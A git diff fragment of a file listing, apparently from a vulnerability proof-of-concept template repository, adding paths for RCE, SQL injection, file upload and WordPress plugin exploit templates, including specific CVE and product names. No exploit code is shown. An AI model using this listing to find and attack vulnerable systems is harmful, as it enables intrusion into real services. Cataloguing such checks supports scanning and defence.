./poc/remote_code_execution/prodigy-commerce-a1ce3c50005a1cffbe6e7d120f43b0db.yaml +./poc/remote_code_execution/prodigy-commerce.yaml ./poc/remote_code_execution/product-carousel-slider-for-woocommerce-75e47a5ed4787943ce44f39bf636a74e.yaml ./poc/remote_code_execution/product-carousel-slider-for-woocommerce.yaml ./poc/remote_code_execution/product-code-for-woocommerce-5ee4216503e0a22cb26fb4c72e6a4204.yaml @@ -122437,6 +122732,7 @@ ./poc/remote_code_execution/ti-woocommerce-wishlist-premium-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/ti-woocommerce-wishlist-premium.yaml ./poc/remote_code_execution/ti-woocommerce-wishlist.yaml +./poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml ./poc/remote_code_execution/titannit-web-rce.yaml ./poc/remote_code_execution/tm-woocommerce-compare-wishlist-c35cca44826bf131ddd624bb4037c9ba.yaml ./poc/remote_code_execution/tm-woocommerce-compare-wishlist.yaml @@ -122564,6 +122860,7 @@ ./poc/remote_code_execution/webappick-product-feed-for-woocommerce-ef466bbf7b36c7f4169533ec1161bc46.yaml ./poc/remote_code_execution/webappick-product-feed-for-woocommerce.yaml ./poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit-ca4c619b208bcba2a3262a03cfacdba5.yaml +./poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml ./poc/remote_code_execution/webmin-cve-2019-15107-rce.yaml ./poc/remote_code_execution/webmin-cve-2019-15107-rce.yml ./poc/remote_code_execution/webpack-sourcemap-disclosure.yaml @@ -123083,6 +123380,7 @@ ./poc/remote_code_execution/woocommerce-multiple-free-gift-939e3a08a9f8b49368755587a40c875e.yaml ./poc/remote_code_execution/woocommerce-multiple-free-gift.yaml ./poc/remote_code_execution/woocommerce-myparcel-19ad14ddf207ea295ff49c75f6ba3023.yaml +./poc/remote_code_execution/woocommerce-myparcel.yaml ./poc/remote_code_execution/woocommerce-ninjaforms-product-addons-fe7479a6b6025e86397ca09e26459aa3.yaml ./poc/remote_code_execution/woocommerce-ninjaforms-product-addons.yaml ./poc/remote_code_execution/woocommerce-one-page-checkout-0fb2ac203a6e2b270723afe1dd3e678a.yaml @@ -124379,6 +124677,8 @@ ./poc/search/manage-engine-ad-search-8733.yaml ./poc/search/manage-engine-ad-search.yaml ./poc/search/meilisearch-detect.yaml +./poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml +./poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml ./poc/search/posts-search-b718660b00038c4eaa678ffe6a2a2cca.yaml ./poc/search/posts-search.yaml ./poc/search/predictive-search-0cf50064291ac9de617b4097519a9b8d.yaml @@ -127420,6 +127720,7 @@ ./poc/sql/CVE-2024-11008-db2446809c807d08d31f51bc0a794536.yaml ./poc/sql/CVE-2024-11010-7519a29fa5d8193b924c132cd64d9dbf.yaml ./poc/sql/CVE-2024-11088-564fc5eaafcf306cc1db90950bcd86ec.yaml +./poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml ./poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml ./poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml ./poc/sql/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml @@ -127454,7 +127755,11 @@ ./poc/sql/CVE-2024-11754-f1c9edc69abf1d1c2adb003324039811.yaml ./poc/sql/CVE-2024-11809-f088a4ea2afc64dbeeb9c239f0dd835c.yaml ./poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml +./poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml +./poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml ./poc/sql/CVE-2024-11868-73a881cdb32507d918f8143682e8cdbd.yaml +./poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml +./poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml ./poc/sql/CVE-2024-11904-5fe3b58edbf68a55952920a93fb3f296.yaml ./poc/sql/CVE-2024-1209-262fb41bb4526e178dfcbc92b07bdb7c.yaml ./poc/sql/CVE-2024-12128-5b31f632a2dbc3187253dd9153d43eba.yaml @@ -128245,6 +128550,7 @@ ./poc/sql/CVE-2024-9652-44db9961d333aa8937876e8e157f625b.yaml ./poc/sql/CVE-2024-9686-0cacdb2f49f04713e2869267a33b0516.yaml ./poc/sql/CVE-2024-9687-b374db15d58a163b3240b89c41715498.yaml +./poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml ./poc/sql/CVE-2024-9704-f21a430d525f14c5222622c2499dbc1f.yaml ./poc/sql/CVE-2024-9772-63449420292c2222e67d62f0c2db8bf3.yaml ./poc/sql/CVE-2024-9776-b87b3db31f1eda93892f1d85c0aa0846.yaml @@ -128567,6 +128873,7 @@ ./poc/sql/adblock-notify-by-bweb-09712df89f849ba85b08f5f0deb0865b.yaml ./poc/sql/adblock-notify-by-bweb.yaml ./poc/sql/adbuddy-adblocker-detection-3bb46498f1afb79669fda4714744548d.yaml +./poc/sql/adbuddy-adblocker-detection.yaml ./poc/sql/add-actions-and-filters-2062b3d0152716b08dbb9bcc487575a6.yaml ./poc/sql/add-custom-body-class-73eea1ff1972b4ee61f8bbfdba1f9166.yaml ./poc/sql/add-custom-css-and-js-1aa54d0c3f88c0268db513e4b2afc065.yaml @@ -129505,6 +129812,7 @@ ./poc/sql/create-block-theme-729116a8e0864b43db4ff160d409fd56.yaml ./poc/sql/create-mysql-detection.yaml ./poc/sql/creative-mail-by-constant-contact-81dbf091f815d0879e7547f1f800a4fa.yaml +./poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml ./poc/sql/crm-perks-forms-df948c9db2d7d0836b43af04517a2188.yaml ./poc/sql/crm2go-28d1263dea4b625d406cdbe195fe59b3.yaml ./poc/sql/crmeb-sqli.yaml @@ -129569,6 +129877,7 @@ ./poc/sql/customize-login-6bc72b71e8cd0dbddc9b60f508953d2e.yaml ./poc/sql/customize-login-image-604de254992d58db93ceab0ba09968f5.yaml ./poc/sql/cvms-sqli.yaml +./poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml ./poc/sql/cybersoldier-0d4e2476f7a9f0dba7d4566f0c76ba66.yaml ./poc/sql/cyclone-slider-9e821dbd0d443e94c28eb42e2a474a7e.yaml ./poc/sql/da-reactions-6477bf18cad6c823db485408d49b337b.yaml @@ -130127,6 +130436,8 @@ ./poc/sql/fangweicms-sqli.yaml ./poc/sql/fangweicms-sqli.yml ./poc/sql/fanruan-finereport-fr_dialog-sqli.yaml +./poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml +./poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml ./poc/sql/fanwei-ebridge-addtaste-sqli.yaml ./poc/sql/fanwei-eweaver-showdocsimageservlet-sqli.yaml ./poc/sql/fanwei-upgrade-sqli.yaml @@ -130619,6 +130930,7 @@ ./poc/sql/import-users-from-csv-with-meta-5ae540e88cb1330d6b0edb80cb536c4f.yaml ./poc/sql/import-users-from-csv-with-meta-5efeb10bcd7116457ddb14cd2034038c.yaml ./poc/sql/import-users-from-csv-with-meta-8c3af6b78cdbf68a297b87232eecaf44.yaml +./poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml ./poc/sql/inazo-advanced-ads-management-aa08fbd88edca8dbb4cd29426f2a4a55.yaml ./poc/sql/inbound-brew-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/indeed-membership-pro-9649320db97cb88ae1de28a12e634fc0.yaml @@ -130695,6 +131007,7 @@ ./poc/sql/jdbc-connection-string-8246.yaml ./poc/sql/jdbc-connection-string.yaml ./poc/sql/jds-portfolio-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml ./poc/sql/jeecg-boot-queryFieldBySql-sqli.yaml ./poc/sql/jeeng-push-notifications-b9d756b997db8ed19a92f52d10f55566.yaml ./poc/sql/jeg-elementor-kit-afcfb0a6aba99eda7112db6ba445be29.yaml @@ -131112,6 +131425,7 @@ ./poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml ./poc/sql/moveto-154cdc35f396e8fc20508edb7d0555dc.yaml ./poc/sql/movie-database-b1e09ab8611ddb31d85cd0e793d89389.yaml +./poc/sql/movie-database.yaml ./poc/sql/mp-timetable-c7a9ef628b1154c47dbf0b3fd366d29d.yaml ./poc/sql/mq-woocommerce-products-price-bulk-edit-1af1bfa2b2a7cb0a9db573b3931a0491.yaml ./poc/sql/mrkwp-footer-for-divi-6477bf18cad6c823db485408d49b337b.yaml @@ -131659,6 +131973,7 @@ ./poc/sql/qibocms-sqli.yml ./poc/sql/qilai-oa-sqli.yaml ./poc/sql/qilai-oa-sqli1.yaml +./poc/sql/qiwang-ERP-drawGrid-sqli.yaml ./poc/sql/qiwang-erp-sql-comboxstore.yaml ./poc/sql/qode-instagram-widget-26f33f7442549dca3a8db4ead5773c3c.yaml ./poc/sql/qode-instagram-widget-a4d47fbcc8ba75eedb704bdd7cb00b46.yaml @@ -132090,6 +132405,7 @@ ./poc/sql/sina-extension-for-elementor-bc95d42bdd955507837edba15c594b62.yaml ./poc/sql/sina-extension-for-elementor-c628af513dbf63244f690c5fe520be33.yaml ./poc/sql/sintic_gallery-dba58849ff842fccc9f3a0395ea1bdf9.yaml +./poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml ./poc/sql/sirv-50d73e2c252117d71be521471dbd6c70.yaml ./poc/sql/sis-handball-8cafe4e48984557c842cbe1e18cc78f0.yaml ./poc/sql/sis-handball-967c306912ff6641facb9ba5be13a1ee.yaml @@ -133362,6 +133678,7 @@ ./poc/sql/wp-job-manager-resumes-708c91d109621edb26b9c0651bc1fb89.yaml ./poc/sql/wp-job-openings-af2c35f9ce7ba3572d5127d1db8fe3a7.yaml ./poc/sql/wp-job-portal-01f968db5483a0b7e206fc18507075c8.yaml +./poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml ./poc/sql/wp-jobsearch-12e7b7e870879cde0d048ddb78b1deff.yaml ./poc/sql/wp-jobsearch-2c4bdb5c3d4ea7464d5b6e88f1173a27.yaml ./poc/sql/wp-jobsearch-3003eb9d50d1efc6a58d35a1db2175a8.yaml @@ -133709,6 +134026,7 @@ ./poc/sql/yith-woocommerce-product-vendors-7089ab18627bdbdafbf32b0be13d15ce.yaml ./poc/sql/yith-woocommerce-tab-manager-e6e7cd74e4562bc2eadbce150a95c58e.yaml ./poc/sql/yith-woocommerce-wishlist-96db56825f3804eea351db0949dce178.yaml +./poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml ./poc/sql/yml-for-yandex-market-6cfbcf5f28e11f92dbbaba64d8f47ad3.yaml ./poc/sql/yongyou-ICurrtype-sqli.yaml ./poc/sql/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml @@ -133720,6 +134038,7 @@ ./poc/sql/yongyou-ksoa-sql-servletimagefield.yaml ./poc/sql/yongyou-ksoa-sql-time-PayBill.yaml ./poc/sql/yongyou-ksoa-sql-time-TaskRequestServlet.yaml +./poc/sql/yongyou-nc-process-sqli.yaml ./poc/sql/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/sql/yongyou-u8-RegisterServlet-sql-Injection.yaml ./poc/sql/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml @@ -133727,6 +134046,7 @@ ./poc/sql/yongyou-u8-oa-sqli-11747.yaml ./poc/sql/yongyou-u8-oa-sqli.yaml ./poc/sql/yongyou-u8-oa-sqli.yml +./poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml ./poc/sql/yonyou-GRP-U8-SQL.yaml ./poc/sql/yonyou-KSOA-PayBill-SQL.yaml ./poc/sql/yonyou-KSOA-TaskRequestServlet-SQL.yaml @@ -133811,6 +134131,7 @@ ./poc/sql/zerobounce-28a8db3cd0f1837cb2f766f6f0110c2d.yaml ./poc/sql/zerof-web-server-handleevent-sqli.yaml ./poc/sql/zhibang_erp_GetPersonalSealData_sqli.yaml +./poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml ./poc/sql/zhixiang-oa-msglog-aspx-sql-inject.yaml ./poc/sql/zhixiang-oa-msglog-sqli.yaml ./poc/sql/zhixiangOA-msg.aspx-sql.yaml @@ -134178,6 +134499,7 @@ ./poc/sql_injection/csz-cms-multiple-blind-sql-injection.yaml ./poc/sql_injection/csz-cms-sqli.yaml ./poc/sql_injection/cvms-sqli.yaml +./poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml ./poc/sql_injection/dahua-WPMS-sqli.yaml ./poc/sql_injection/dahua-clientserver-sqli.yaml ./poc/sql_injection/dahua-searchJson-sqli.yaml @@ -134315,6 +134637,8 @@ ./poc/sql_injection/fangweicms-sqli.yaml ./poc/sql_injection/fangweicms-sqli.yml ./poc/sql_injection/fanruan-finereport-fr_dialog-sqli.yaml +./poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml +./poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml ./poc/sql_injection/fanwei-ebridge-addtaste-sqli.yaml ./poc/sql_injection/fanwei-eweaver-showdocsimageservlet-sqli.yaml ./poc/sql_injection/fanwei-upgrade-sqli.yaml @@ -134382,6 +134706,7 @@ ./poc/sql_injection/indonasia-toko-cms-sql.yaml ./poc/sql_injection/ioffice-oa-sqli.yaml ./poc/sql_injection/isNotInTable-sqli.yaml +./poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml ./poc/sql_injection/jeecg-boot-queryFieldBySql-sqli.yaml ./poc/sql_injection/jinhe-jc6-sqli.yaml ./poc/sql_injection/jinhe-oa-c6-generalxmlhttppage-sqli.yaml @@ -134544,6 +134869,7 @@ ./poc/sql_injection/qibocms-sqli.yml ./poc/sql_injection/qilai-oa-sqli.yaml ./poc/sql_injection/qilai-oa-sqli1.yaml +./poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml ./poc/sql_injection/qiwang-erp-sql-comboxstore.yaml ./poc/sql_injection/quick-cms-sqli.yaml ./poc/sql_injection/readymade-unilevel-sqli.yaml @@ -134816,6 +135142,7 @@ ./poc/sql_injection/yongyou-ksoa-sql-servletimagefield.yaml ./poc/sql_injection/yongyou-ksoa-sql-time-PayBill.yaml ./poc/sql_injection/yongyou-ksoa-sql-time-TaskRequestServlet.yaml +./poc/sql_injection/yongyou-nc-process-sqli.yaml ./poc/sql_injection/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/sql_injection/yongyou-u8-RegisterServlet-sql-Injection.yaml ./poc/sql_injection/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml @@ -134823,6 +135150,7 @@ ./poc/sql_injection/yongyou-u8-oa-sqli-11747.yaml ./poc/sql_injection/yongyou-u8-oa-sqli.yaml ./poc/sql_injection/yongyou-u8-oa-sqli.yml +./poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml ./poc/sql_injection/yonyou-GRP-U8-SQL.yaml ./poc/sql_injection/yonyou-KSOA-PayBill-SQL.yaml ./poc/sql_injection/yonyou-KSOA-TaskRequestServlet-SQL.yaml @@ -134886,6 +135214,7 @@ ./poc/sql_injection/zero-spam-sqli.yaml ./poc/sql_injection/zerof-web-server-handleevent-sqli.yaml ./poc/sql_injection/zhibang_erp_GetPersonalSealData_sqli.yaml +./poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml ./poc/sql_injection/zhixiang-oa-msglog-aspx-sql-inject.yaml ./poc/sql_injection/zhixiang-oa-msglog-sqli.yaml ./poc/sql_injection/zhixiangOA-msg.aspx-sql.yaml @@ -135693,6 +136022,7 @@ ./poc/upload/E-office 任意文件上传-mobile_upload_save(CVE-2023-2523).yaml ./poc/upload/E-office-do_excel-FileUpload.yaml ./poc/upload/E-office10-Upload.yaml +./poc/upload/EKing-Base64Upload-fileupload.yaml ./poc/upload/Esafenet-CDG-upload-UploadFileFromClientServiceForClient.yaml ./poc/upload/File upload - Double extensions.yaml ./poc/upload/File upload - MIME type.yaml @@ -135762,6 +136092,7 @@ ./poc/upload/bocai-anyfile-upload.yaml ./poc/upload/change-uploaded-file-permissions-f2c9a39b10e325775f68bea24bea9c06.yaml ./poc/upload/change-uploaded-file-permissions.yaml +./poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml ./poc/upload/chanjet-Tplus-upload-Upload.yaml ./poc/upload/chanjet-tplus-fileupload.yaml ./poc/upload/checkout-files-upload-woocommerce-a18625d490ed71d145a8925252bef46d.yaml @@ -135858,6 +136189,7 @@ ./poc/upload/file-upload-types-0ae0add1178211808ca9adb56c0020f3.yaml ./poc/upload/file-upload-types.yaml ./poc/upload/file-upload.yaml +./poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml ./poc/upload/fine-report-v9-file-upload.yaml ./poc/upload/flink-upload-rce.yaml ./poc/upload/fluid-accessible-uploader-45ba464412c6ae4b94e80349ccf8b660.yaml @@ -135879,6 +136211,7 @@ ./poc/upload/gravity-file-ajax-upload-free-c741afeba607d04a91c7ec20302b3dd6.yaml ./poc/upload/gravity-file-ajax-upload-free.yaml ./poc/upload/grp-u8-uploadfiledata-fileupload.yaml +./poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml ./poc/upload/h3c-cvm-anyfile-upload.yaml ./poc/upload/h3c-selfservice-flexfileupload-fileupload.yaml ./poc/upload/h3c_campus_network_self_service_system_flexifileupload_arbitrary_file_upload.yaml @@ -135914,6 +136247,7 @@ ./poc/upload/images-optimize-and-upload-cf7.yaml ./poc/upload/increase-upload-file-size-maximum-execution-time-limit-d66f2cb0528cb877e17943517257d459.yaml ./poc/upload/increase-upload-file-size-maximum-execution-time-limit.yaml +./poc/upload/inspur-GS-UploadListFile-uploadfile.yaml ./poc/upload/ioffice_iorepsavexml_upload.yaml ./poc/upload/jan-file-upload.yaml ./poc/upload/jinhe-oa-c6-uploadfiledownloadnew-fileread.yaml @@ -135926,6 +136260,7 @@ ./poc/upload/jinher_OA_JC6_upload.yaml ./poc/upload/jinher_OA_uploadImagedownloadIn_fileread.yaml ./poc/upload/jinher_OA_uploaddoc_sqli.yaml +./poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml ./poc/upload/jquery-html5-file-upload-58c64f0190a188752c2bc31ea814e632.yaml ./poc/upload/jquery-html5-file-upload-99d97c3ef9ed363f511bf86081dfd920.yaml ./poc/upload/jquery-html5-file-upload-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -135984,6 +136319,7 @@ ./poc/upload/mainwp-file-uploader-extension-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/upload/mainwp-file-uploader-extension-plugin.yaml ./poc/upload/mainwp-file-uploader-extension.yaml +./poc/upload/meite-crm-upload-upload.yaml ./poc/upload/mingyuanyun-ERP-upload-ApiUpdate.yaml ./poc/upload/mingyuanyun-erp-apiupdate-ashx-fileupload.yaml ./poc/upload/n5-uploadform-275cc5187416715fb3f5d44f3820ae1a.yaml @@ -136030,6 +136366,7 @@ ./poc/upload/nmedia-user-file-uploader-plugin.yaml ./poc/upload/nmedia-user-file-uploader.yaml ./poc/upload/nsfocus-nf-bugsInfo-fileupload.yaml +./poc/upload/nuuo-upload-uploadfile.yaml ./poc/upload/oa-v9-uploads-file-9187.yaml ./poc/upload/oa-v9-uploads-file-9188.yaml ./poc/upload/oa-v9-uploads-file-9189.yaml @@ -136041,6 +136378,7 @@ ./poc/upload/pepro-bacs-receipt-upload-for-woocommerce.yaml ./poc/upload/pigcms-manage-admin-fileupload.yaml ./poc/upload/pikachu_upload.yaml +./poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml ./poc/upload/powercreator-arbitrary-file-upload.yaml ./poc/upload/powercreator-arbitrary-file-upload.yml ./poc/upload/prestashop-blocktestimonial-file-upload.yaml @@ -136371,9 +136709,11 @@ ./poc/upload/yongyou-nc-cloud-upload-jsinvoke.yaml ./poc/upload/yongyou-u8-crm-upload-getemaildata.yaml ./poc/upload/yongyou-u8-upload.yaml +./poc/upload/yongyou-u8c-esnserver-fileupload.yaml ./poc/upload/yongyou-upload.yaml ./poc/upload/yongyouU8_UploadRce.yaml ./poc/upload/yongyou_Servlet_upload.yaml +./poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml ./poc/upload/yonyou-chanjet-tplus-file-upload.yaml ./poc/upload/yonyou-chanjet-tplus-setupaccount-fileupload.yaml ./poc/upload/yonyou-crm-arbitrary-file-upload.yaml @@ -136950,6 +137290,7 @@ ./poc/web/koala-web-server.yaml ./poc/web/kopano-webapp-panel.yaml ./poc/web/kubernetes-web-view.yaml +./poc/web/lanling-oa-hrstaffwebservice-fileread.yaml ./poc/web/lantronix-webmanager-panel.yaml ./poc/web/laravel-improper-webdir.yaml ./poc/web/laravel-improper-webdir.yml @@ -137401,6 +137742,7 @@ ./poc/web/webcomco-panel.yaml ./poc/web/webctrl.yaml ./poc/web/webd-woocommerce-product-excel-importer-bulk-edit-ca4c619b208bcba2a3262a03cfacdba5.yaml +./poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml ./poc/web/webdav-enabled.yaml ./poc/web/webeditors-1.yaml ./poc/web/webeditors-11128.yaml @@ -138651,6 +138993,7 @@ ./poc/wordpress/i-dump-iphone-to-wordpress-photo-uploader-plugin.yaml ./poc/wordpress/i-dump-iphone-to-wordpress-photo-uploader.yaml ./poc/wordpress/indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1.yaml +./poc/wordpress/indeed-wp-superbackup.yaml ./poc/wordpress/index-wp-mysql-for-speed-c0b7cb4b326a8416392c1d09bebe71d4.yaml ./poc/wordpress/index-wp-mysql-for-speed.yaml ./poc/wordpress/insert-or-embed-articulate-content-into-wordpress-0c31dccd0d7be9933fe1ceaf56d128f2.yaml @@ -138709,6 +139052,7 @@ ./poc/wordpress/jcwp-youtube-channel-embed-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/wordpress/jcwp-youtube-channel-embed.yaml ./poc/wordpress/jlayer-parallax-slider-wp-8ff10f61dea7350124b039f1e92690b4.yaml +./poc/wordpress/jlayer-parallax-slider-wp.yaml ./poc/wordpress/jobboardwp-18cb9f5edb780153786e60f4b2af597d.yaml ./poc/wordpress/jobboardwp-27728a3ea145a3bf22ab8423f6c00ff1.yaml ./poc/wordpress/jobboardwp-3bb0ade095b811a07058e97785c9e18a.yaml @@ -138742,6 +139086,7 @@ ./poc/wordpress/jw-player-plugin-for-wordpress-plugin.yaml ./poc/wordpress/jw-player-plugin-for-wordpress.yaml ./poc/wordpress/jwp-a11y-83352b6551092dd47080d7d2a29a35ff.yaml +./poc/wordpress/jwp-a11y.yaml ./poc/wordpress/kindeditor-for-wordpress-510a76a7b2fa0cc170a5f4dce0d03e77.yaml ./poc/wordpress/kindeditor-for-wordpress-7292ad88bc93795269d617a71a5e6b3f.yaml ./poc/wordpress/kindeditor-for-wordpress-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -139277,6 +139622,7 @@ ./poc/wordpress/real-estate-listing-realtyna-wpl-f6a88f0b9b916f8e5f7f55275d656e2c.yaml ./poc/wordpress/real-estate-listing-realtyna-wpl.yaml ./poc/wordpress/real-wp-shop-lite-91a45dec7983fa3e47682bea55d7171d.yaml +./poc/wordpress/real-wp-shop-lite.yaml ./poc/wordpress/recipe-card-blocks-by-wpzoom-17b167f964b4e8d7b54a1ca26f157b21.yaml ./poc/wordpress/recipe-card-blocks-by-wpzoom-7f3f241cdb00c9c579dce45a1c4fe856.yaml ./poc/wordpress/recipe-card-blocks-by-wpzoom-b256a8105fe98b4a7604d20b05dc4d98.yaml @@ -139557,6 +139903,7 @@ ./poc/wordpress/users-customers-import-export-for-wp-woocommerce-e748f28389b4b9a3e19d21a7a9fd82a0.yaml ./poc/wordpress/users-customers-import-export-for-wp-woocommerce.yaml ./poc/wordpress/users-import-export-with-excel-for-wp-ca4c619b208bcba2a3262a03cfacdba5.yaml +./poc/wordpress/users-import-export-with-excel-for-wp.yaml ./poc/wordpress/userswp-03f9877dcc1ea93d2d2a37048e3c8a43.yaml ./poc/wordpress/userswp-47dc2afc2eabb2ac331321dc5ab91d71.yaml ./poc/wordpress/userswp-57207794c9d3e3d069ac2156d3c6a959.yaml @@ -140539,6 +140886,7 @@ ./poc/wordpress/wp-action-network-889d920d4ff6444a70f7a9e3a0f53da7.yaml ./poc/wordpress/wp-action-network.yaml ./poc/wordpress/wp-activate-register-redirect.yaml +./poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml ./poc/wordpress/wp-ada-compliance-check-basic-dc14ecaf870d203b479bf0a5d6538958.yaml ./poc/wordpress/wp-ada-compliance-check-basic.yaml ./poc/wordpress/wp-adaptive-xss-11403.yaml @@ -140783,6 +141131,7 @@ ./poc/wordpress/wp-attest.yaml ./poc/wordpress/wp-auctions-89ead7db0eb36d917e5bca365b6051f0.yaml ./poc/wordpress/wp-auctions-a5ddf335d9c4a4d33be097e8c281afcc.yaml +./poc/wordpress/wp-auctions.yaml ./poc/wordpress/wp-auto-affiliate-links-2b6385621ba694838cffc951e0cd217e.yaml ./poc/wordpress/wp-auto-affiliate-links-3c5d91d8dc34d598b50cb95a7c44d63d.yaml ./poc/wordpress/wp-auto-affiliate-links-4468e188d3242885a0164e80befda644.yaml @@ -141505,6 +141854,7 @@ ./poc/wordpress/wp-donate-da3f0f16feb56d7497b76972109fd5c9.yaml ./poc/wordpress/wp-donate.yaml ./poc/wordpress/wp-donimedia-carousel-3ee6db1ee25b24e0072c18227982adb0.yaml +./poc/wordpress/wp-donimedia-carousel.yaml ./poc/wordpress/wp-donottrack-6aad08d4158c4571f0f40ff372bdaba5.yaml ./poc/wordpress/wp-donottrack-a4541373636ec471e3e2bd26a80cde61.yaml ./poc/wordpress/wp-donottrack-a97e14f40e38e3a1337c554459e04ffc.yaml @@ -142558,17 +142908,23 @@ ./poc/wordpress/wp-job-openings.yaml ./poc/wordpress/wp-job-portal-01f968db5483a0b7e206fc18507075c8.yaml ./poc/wordpress/wp-job-portal-08bfb4b123d4a75d849c2255041b9f92.yaml +./poc/wordpress/wp-job-portal-0fd8a0f3624a9ac01ba2ce3c3af9b360.yaml ./poc/wordpress/wp-job-portal-12c945b509573fbebe58ec8bd17dacc1.yaml ./poc/wordpress/wp-job-portal-3ed29051521d7b123afa881d9f582a09.yaml +./poc/wordpress/wp-job-portal-44ca926d802c7e810b6f185672896cf3.yaml ./poc/wordpress/wp-job-portal-58dafb39f01c57b90c9e86a2242739b8.yaml ./poc/wordpress/wp-job-portal-6991636be674dec0e6ae129f466cf764.yaml ./poc/wordpress/wp-job-portal-715d52378457a7ac370cc45a9dc1e067.yaml ./poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml ./poc/wordpress/wp-job-portal-a5bdc2b0068a1c535dc51453d211dcd6.yaml +./poc/wordpress/wp-job-portal-ac656f0515b546b4fd6aadacc13c1a52.yaml +./poc/wordpress/wp-job-portal-ae4beac744bf60cad4d49b935292f33a.yaml ./poc/wordpress/wp-job-portal-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-job-portal-d51f4fd87b69ac765648da293bd32a31.yaml +./poc/wordpress/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml ./poc/wordpress/wp-job-portal-f30a1250ca423391f4cfcfaaf18957f1.yaml ./poc/wordpress/wp-job-portal-f7ec98d69a0944149a1d98bba86a2fe9.yaml +./poc/wordpress/wp-job-portal-fa33fbce4070912e4a2de446cc7f9493.yaml ./poc/wordpress/wp-job-portal-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-job-portal-plugin.yaml ./poc/wordpress/wp-job-portal.yaml @@ -143354,6 +143710,7 @@ ./poc/wordpress/wp-photo-effects-ca7fd9aea5cc20f637f6d935b1fd3bd7.yaml ./poc/wordpress/wp-photo-effects.yaml ./poc/wordpress/wp-photo-text-slider-50-952a4b7410320a762fcfe741f0ebcebf.yaml +./poc/wordpress/wp-photo-text-slider-50-b363eafeebe4e86c4b8a3cfae536824b.yaml ./poc/wordpress/wp-photo-text-slider-50.yaml ./poc/wordpress/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml ./poc/wordpress/wp-php-widget.yaml @@ -144652,6 +145009,7 @@ ./poc/wordpress/wp-tinymce-lfi.yaml ./poc/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml ./poc/wordpress/wp-tithely-fa54958de0b95d943c97eef399cbadee.yaml +./poc/wordpress/wp-tithely.yaml ./poc/wordpress/wp-tmkm-amazon-1523dfa46e6cef9963464f327801e736.yaml ./poc/wordpress/wp-tmkm-amazon.yaml ./poc/wordpress/wp-to-buffer-57da4de511c877c38dd35e63b1bf95b6.yaml @@ -145323,6 +145681,7 @@ ./poc/wordpress/wpcargo-c8e77c2f7459cf7f7794c40d82f220a1.yaml ./poc/wordpress/wpcargo.yaml ./poc/wordpress/wpcasa-639a6c2d23467f866364578ced73357f.yaml +./poc/wordpress/wpcasa.yaml ./poc/wordpress/wpcb-6dbaf5cc33a2e3921e359ba2f93b22fd.yaml ./poc/wordpress/wpcb.yaml ./poc/wordpress/wpcf7-recaptcha.yaml diff --git a/poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml 